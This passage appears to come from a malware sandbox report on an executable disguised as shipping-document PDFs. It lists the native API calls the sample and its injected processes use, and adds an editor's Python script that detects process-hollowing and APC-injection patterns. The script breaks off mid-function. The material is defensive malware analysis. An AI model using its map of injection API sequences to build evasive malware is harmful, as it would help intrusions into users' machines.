      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F89EB NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3A46 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0A5C NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9A7A NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3A82 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3AAE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9AB1 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3AEC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9AE5 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F36F7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9B0D NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3B08 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9B4B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3744 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3B40 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F2FAB NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F37A1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9BB3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3BCE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F97DC NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9BEE NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F37EC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3C06 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9804 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F982F NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9C2E NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3828 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3C6F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F988A NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F989B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9C99 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3CC8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9CDC NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F98D4 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F38E4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F24E2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F38F0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F090E NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F990D NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9D09 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0905 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F451B NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0517 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3D3C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9941 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F395C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F996B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F097E NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9D74 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3D8C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9998 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3191 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F39A2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F55B8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9DB7 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F09CD NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F99D3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F9DEB NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F3DE9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F79FD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F41FB NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3EA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3EA770 NtOpenThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3EA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3EB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3EAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9560 NtWriteFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E99D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056451B LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005691CF NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056322E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005697D3 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00564395 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00564441 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569804 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056443B LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569C2E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056982F NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005698D4 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569CDC NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005644EE LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00564490 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056989B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569C99 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056988A NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569941 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569D74 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056456E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056996B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056450E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056990D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569D09 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00564522 NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005699D3 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569DEB NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00563191 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569998 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569DB7 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00564654 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00563246 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569A7A NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_0056462E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569AE5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005632E9 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00563288 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569AB1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569B4B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00563349 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569B0D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005697DC NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569BEE NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00569BB3 NtQueryInformationProcess,
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F4A32 NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035496D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035495D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035499D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035498F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035498A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035497A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549560 NtWriteFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03549520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035495F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69DF0 NtReadFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69D40 NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69E70 NtClose,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69F20 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69D3B NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69E6A NtClose,
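The "Code function" evidence above lists, per process, the native API call sites the sandbox found in code it extracted (process 0 and 1 are the sample's own image, 3 is explorer.exe, 11 is wlanext.exe). Read individually these lines say little; read as sets per process they explain the verdicts "Sample uses process hollowing technique" and "Queues an APC in another process": process 1 and process 11 both contain NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread, plus NtQueueApcThread. The script below is an added example by the editor, not part of the sandbox report: it parses lines in the report's format (the cells are separated by a space here), groups the API names by the leading process index of the "N_2_ADDR" identifier (the reading of that identifier as process index, stage, address is an assumption), and flags technique-level combinations. The technique rules are the editor's own, not the sandbox vendor's signatures, and the sample lines are a constructed subset copied from the report. One caveat is built in: NtSetInformationThread on its own is weak evidence, because only the ThreadHideFromDebugger information class hides a thread and the call name does not tell you which class was passed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: a subset of the report's "Code function" lines, with the
# flattened "Source ... Code function" cells separated by a space.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 0_2_020F086A EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 0_2_020F7FAA NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 0_2_020F3A46 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 0_2_020F97D3 NtResumeThread,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3EAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe Code function: 1_2_1E3E9950 NtQueueApcThread,
Source: C:\Windows\explorer.exe Code function: 3_2_061F4A32 NtCreateFile,
Source: C:\Windows\explorer.exe Code function: 3_2_061EB072
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 11_2_035497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 11_2_035498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 11_2_0354AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 11_2_03549A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 11_2_03549950 NtQueueApcThread,
"""

# "N_2_ADDR": assumed to be process index, stage, and code address.
LINE_RE = re.compile(
    r"^Source:\s+(?P<image>.+?)\s+Code function:\s+"
    r"(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>\S*)\s*$"
)

# API sets that together characterise a technique.  These are the editor's
# rules for this example, not the sandbox vendor's signatures.
TECHNIQUE_RULES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    # Weak on its own: only the ThreadHideFromDebugger information class hides
    # a thread, and the call name does not reveal which class was passed.
    "thread hiding (weak)": {"NtSetInformationThread"},
}


@dataclass
class ProcessCalls:
    image: str
    sites: dict = field(default_factory=lambda: defaultdict(set))  # api -> {addr}

    @property
    def apis(self):
        return set(self.sites)


def parse_code_function_lines(text):
    """Group the API names of 'Code function' lines by process index."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        proc = int(m.group("proc"))
        entry = procs.setdefault(proc, ProcessCalls(image=m.group("image")))
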